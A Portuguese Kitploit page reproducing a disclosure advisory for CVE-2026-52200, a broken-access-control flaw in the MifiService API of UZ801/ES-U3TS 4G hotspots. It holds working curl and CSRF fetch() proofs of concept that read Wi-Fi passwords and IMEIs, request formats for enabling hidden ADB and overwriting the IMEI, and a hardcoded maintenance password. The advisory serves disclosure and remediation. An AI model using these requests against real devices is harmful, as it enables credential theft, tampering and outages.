Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/lamaper/cve-2026-52200
Segurança IoTAnálise de VulnerabilidadesExploraçãoAuditoria de ConfiguraçãoColeta de InformaçõesSegurança WebTestes de Penetração
GitHublamaper/cve-2026-52200

CVE-2026-52200

Advisory de segurança detalhando controle de acesso quebrado na API web MifiService do UZ801/ES-U3TS, permitindo extração de dados não autenticada, modificação de configuração e reinicialização do dispositivo. Inclui PoCs e mitigações.

Ver Repositório
há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

UZ801 / ES-U3TS MifiService Controle de Acesso Quebrado

Aviso de segurança e notas técnicas sobre um problema de controle de acesso quebrado na API de gerenciamento web embarcada exposta por MifiService.apk na plataforma OEM / white-label UZ801_v2.1 de Wi-Fi móvel 4G LTE, também observada comercializada como ES-U3TS.

Este repositório tem como objetivo apoiar a divulgação coordenada e a atribuição de CVE. Ele se concentra em evidências técnicas reproduzíveis e não armamentizadas.

Resumo

O dispositivo afetado expõe um endpoint de gerenciamento HTTP baseado em Jetty em:

root@kitploit:~
http://192.168.100.1/ajax

O despachante de requisições do backend é implementado em:

root@kitploit:~
com.mifiservice.server.AjaxSevlet

Embora a interface web apresente uma página de login, o backend não impõe uma sessão autenticada válida no lado do servidor para a maioria das funções de gerenciamento. Como resultado, um atacante na rede adjacente pode invocar diretamente operações sensíveis de funcNo sem autenticação.

O impacto verificado inclui:

  • extração da senha atual do Wi-Fi em texto claro
  • extração de IMEI, informações de firmware, status do SIM e configuração de rede
  • extração da configuração de DHCP e filtro MAC
  • modificação e persistência da configuração de gerenciamento sem autenticação
  • acionamento de redefinição de configuração e reinicialização do dispositivo sem autenticação

Funções adicionais de alto risco foram confirmadas por análise estática, incluindo:

  • reinicialização para o bootloader
  • ativação de modos USB ADB / Qualcomm Diag ocultos e reinicialização
  • funcionalidade não documentada de sobrescrita de IMEI

Escopo e nomenclatura

O hardware testado parece pertencer a uma família de dispositivos OEM / white-label. O fornecedor original exato de desenvolvimento é atualmente desconhecido, e nenhum contato de segurança confiável do fornecedor foi identificado até o momento.

Este aviso, portanto, usa a seguinte nomenclatura de produto:

  • Plataforma: UZ801_v2.1
  • Alias de marketing observado: ES-U3TS
  • Firmware observado: UZ801-V3.4.3
  • Aplicativo observado: MifiService.apk
  • Pacote observado: com.mifiservice.hello

Se marcas ou revendedores adicionais forem encontrados distribuindo o mesmo firmware, APK, ativos web e comportamento de funcNo, eles devem ser tratados como variantes provavelmente afetadas do mesmo código-base.

Componente afetado

  • Endpoint da API web /ajax
  • MifiService.apk
  • com.mifiservice.server.AjaxSevlet

Causa raiz

Este não é principalmente um problema de credenciais padrão.

A causa raiz é o controle de acesso quebrado na API do backend:

  • nenhuma sessão autenticada no lado do servidor é imposta para a maioria das requisições de gerenciamento
  • nenhuma proteção CSRF está presente
  • nenhuma validação de Origin está presente
  • nenhuma validação de Referer está presente
  • nenhum cookie de sessão ou token é exigido para a maioria das funções sensíveis

A função de login existe, mas não fornece limites de autorização significativos para a maior parte da API de gerenciamento.

Modelo de ameaça

Vetor de ataque primário:

  • atacante na rede adjacente conectado ao hotspot do dispositivo

Vetor de ataque secundário:

  • exploração baseada em navegador via CSRF / drive-by contra uma vítima atualmente conectada à LAN do dispositivo

Este não é um ataque remoto exposto à internet por padrão. O atacante deve:

  • ter alcance direto de Camada 2 / Camada 3 até 192.168.100.1, ou
  • coagir o navegador de uma vítima conectada a enviar requisições ao endpoint do dispositivo

Status das evidências

Todas as descobertas abaixo estão incluídas como funcionalidade afetada do mesmo problema de controle de acesso quebrado.
Quando relevante, cada item é explicitamente marcado como:

  • Validado ao vivo
  • Confirmado por análise estática

Essa distinção é preservada para precisão. Funcionalidades de alto risco não são rotuladas erroneamente como testadas ao vivo quando não foram intencionalmente executadas em hardware público.

Descobertas técnicas por grupo de função

Divulgação de informações sem autenticação

Modificação de configuração sem autenticação

Ações disruptivas / administrativas sem autenticação

Funcionalidade não documentada ou estilo manutenção

funcNoDescriçãoStatusNotas

Status do fornecedor

  • Fornecedor upstream original: desconhecido
  • Tipo de produto: plataforma de roteador móvel OEM / white-label
  • Contato PSIRT / segurança confiável: não identificado
  • Estado atual de divulgação: fornecedor inacessível / nenhum canal de segurança do fornecedor confirmado

No momento da redação, o dispositivo parece ser vendido por meio de canais OEM / revendedores com marca inconsistente ou ausente, e nenhum contato confiável do fornecedor de desenvolvimento original foi estabelecido.

Exemplos de PoC seguros

Os exemplos abaixo são intencionalmente limitados a validação somente leitura ou de baixo impacto. Eles são incluídos para demonstrar a vulnerabilidade sem fornecer um fluxo de trabalho de exploração armamentizado.

1. Ler a senha atual do Wi-Fi sem autenticação

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1002}' \
  http://192.168.100.1/ajax

Comportamento esperado:

  • retorna JSON
  • inclui ssid
  • inclui pwd em texto claro

2. Ler informações de identificação do dispositivo sem autenticação

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1029}' \
  http://192.168.100.1/ajax

Comportamento esperado:

  • retorna JSON
  • inclui imei
  • inclui fwversion

3. Demonstrar acesso de escrita persistente não autorizado usando um campo de baixo risco

Ler o idioma atual:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1030}' \
  http://192.168.100.1/ajax

Definir idioma:

root@kitploit:~
curl -s \
  -H "Content-Type: application/json" \
  -d '{"funcNo":1031,"Language":"Chinese"}' \
  http://192.168.100.1/ajax

Restaure o valor original depois.

4. Conceito de CSRF baseado em navegador

Este endpoint não impõe estado de sessão nem validação de Origin / Referer. Portanto, o navegador de uma vítima conectada pode ser abusado para enviar requisições em segundo plano.

Página mínima de demonstração:

root@kitploit:~
<!doctype html>
<meta charset="utf-8">
<script>
fetch("http://192.168.100.1/ajax", {
  method: "POST",
  headers: {"Content-Type": "application/json"},
  body: JSON.stringify({funcNo: 1002})
});
</script>

Este exemplo é intencionalmente limitado a um número de função somente leitura. Não o implante contra usuários ou dispositivos de produção.

Formatos de requisição não públicos / de alto risco

Os seguintes formatos JSON são documentados apenas para análise defensiva e triagem. Eles não são acompanhados de etapas de execução aqui.

2001 - ativar interfaces de depuração ocultas

root@kitploit:~
{"funcNo":2001}

Comportamento observado no código:

  • executa setprop persist.sys.usb.config rndis,serial_smd,diag,adb
  • executa sync
  • reinicia o dispositivo

2004 - caminho de sobrescrita de IMEI

root@kitploit:~
{"funcNo":2004,"imei":"<redacted-test-value>"}

Comportamento observado no código:

  • chama um caminho equivalente a AT+WRIMEI=<value>
  • verifica o sucesso por meio de um caminho de leitura de IMEI de acompanhamento

Nenhum teste ao vivo público é incluído aqui devido a preocupações legais, de conformidade e de integridade do dispositivo.

Trechos de evidência

Exemplo de resposta sem autenticação para 1002

root@kitploit:~
{
  "results": [
    {
      "dns1": "8.8.8.8",
      "ssid": "4G-UFI-8E1",
      "dns2": "8.8.8.8",
      "mask": "255.255.255.0",
      "pwd": "1234567890",
      "wlan_ip": "192.168.100.1",
      "IP": "192.168.100.1"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Exemplo de resposta sem autenticação para 1029

root@kitploit:~
{
  "results": [
    {
      "manufacture": "Qualcomm Technology",
      "dbm": "",
      "fwversion": "V3.4.3",
      "imei": "863993064154463"
    }
  ],
  "error_info": "none",
  "flag": "1"
}

Por que este é um candidato a CVE

Este problema é um forte candidato a CVE porque:

  • é reproduzível em um dispositivo controlado pelo cliente
  • é alcançável por um atacante na rede adjacente
  • não depende de modificação física não documentada
  • não é meramente um problema de senha padrão
  • tem impacto em confidencialidade, integridade e disponibilidade

Classificação sugerida:

  • CWE-306 Ausência de Autenticação para Função Crítica
  • CWE-862 Ausência de Autorização

CVSS sugerido:

root@kitploit:~
CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Status de divulgação

  • Análise estática concluída: 2026-05-11
  • Validação ao vivo concluída: 2026-05-12
  • Preparação do contato com o fornecedor concluída: 2026-05-12
  • Rascunho do aviso público preparado: 2026-05-12

Mitigações

  • exigir uma sessão autenticada válida no lado do servidor para todas as funções de gerenciamento
  • rejeitar todas as requisições sensíveis de funcNo sem autenticação
  • adicionar proteção CSRF
  • validar Origin e Referer
  • remover endpoints de manutenção não documentados das versões de produção
  • nunca expor credenciais de Wi-Fi por meio de respostas de API sem autenticação

Aviso legal e de segurança

Este repositório é destinado a pesquisa defensiva, divulgação de vulnerabilidades e coordenação. Os exemplos públicos são intencionalmente limitados a validação de baixo risco. Funcionalidades de alto risco são documentadas apenas na medida necessária para remediação e triagem de CVE.

Baixar ferramenta
funcNoDescriçãoStatusNotas
1002Ler SSID, IP do dispositivo, DNS, senha do Wi-FiValidado ao vivoRetorna a senha do Wi-Fi em texto claro
1009Ler modo de criptografia e senha do Wi-FiValidado ao vivoRetorna a senha do Wi-Fi em texto claro
1011Ler faixa de DHCP, DNS, lista de clientesValidado ao vivoÚtil para reconhecimento local
1015Ler status do SIMValidado ao vivoRetorna o estado do SIM
1029Ler IMEI, firmware, fabricante, informações de sinalValidado ao vivoRetorna identidade sensível do dispositivo
1052Ler modo de filtro MAC e entradas configuradasValidado ao vivoVaza política e slots configurados
2002Ler slot SIM ativoValidado ao vivoExpõe estado de execução
funcNoDescriçãoStatusNotas
1004Alterar modo de conexãoConfirmado estaticamenteNenhuma imposição de sessão observada
1005Alterar modo de rede preferidoConfirmado estaticamenteAlto impacto operacional
1007Alterar SSID / contagem máxima de estaçõesConfirmado estaticamentePersiste configuração e reinicia a lógica do AP
1010Alterar modo de criptografia / senha do Wi-FiConfirmado estaticamenteAlto impacto de confidencialidade
1012Alterar configurações relacionadas a DHCP/DNSConfirmado estaticamenteAdulteração da rede local
1016/1017/1018Ler / definir / alternar perfil APNConfirmado estaticamenteModificação do comportamento WAN
1031Alterar idioma e persistirValidado ao vivoUsado como prova de baixo risco de acesso de escrita
1053/1054/1055Alterar comportamento e entradas do filtro MACConfirmado estaticamenteAdulteração do controle de acesso à rede
funcNoDescriçãoStatusNotas
1013Reiniciar dispositivoValidado ao vivoDoS / interrupção de serviço
1014Redefinir configuração do aplicativo/rede e reiniciarValidado ao vivoNão é uma limpeza completa dos dados do usuário Android
2000Reiniciar para o bootloaderValidado ao vivoAlto impacto operacional
2001Ativar configuração USB ADB/Diag oculta e reiniciarConfirmado estaticamenteCaminho de manutenção perigoso
2003Caminho de senha de manutenção ocultaConfirmado estaticamenteUsa admin8888 codificado; comportamento parece parcial / residual
2004Sobrescrever IMEIConfirmado estaticamenteChama caminho de comando AT; não executado publicamente